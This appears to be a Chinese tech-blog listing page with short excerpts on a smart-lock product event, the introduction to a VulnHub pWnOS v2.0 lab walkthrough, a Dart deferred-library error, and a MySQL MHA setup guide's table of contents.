智能锁也能用上GPT技术了&#xff1f;小小智能锁电机&#xff0c;竟然能拉动2.5吨SUV&#xff1f; 今日&#xff0c;中国智能锁领军品牌德施曼在北京举办「2024德施曼创新技术预沟通会」&#xff0c;德施曼技术研发中心总监桑胜伟揭秘了两项行业突破性技术——GPTfinger及龙霆…

vulnhub pWnOS v2.0通关

知识点总结&#xff1a; 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码&#xff0c;查看模块信息 环境准备 攻击机&#xff1a;kali2023 靶机&#xff1a;pWnOS v2.0 安装地址&#xff1a;pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到&#xff0c;该靶…

Deferred library xxx was not loaded

Deferred 延迟修饰词作用下的文件库尚未完成载入

Mysql的MHA

目录 一、MHA概念 1.1 MHA 的组成 1.2 MAH特性 1.3 MHA原理 1.4当主挂了以后会给哪个从服务器&#xff1f; 二、搭建MysqlMHA 2.1实验思路 2.2实验准备 2.3服务搭建 1. 关闭防火墙和selinux 2、修改 master&#xff08;192.168.91.103&#xff09;、Slave1&#xff0…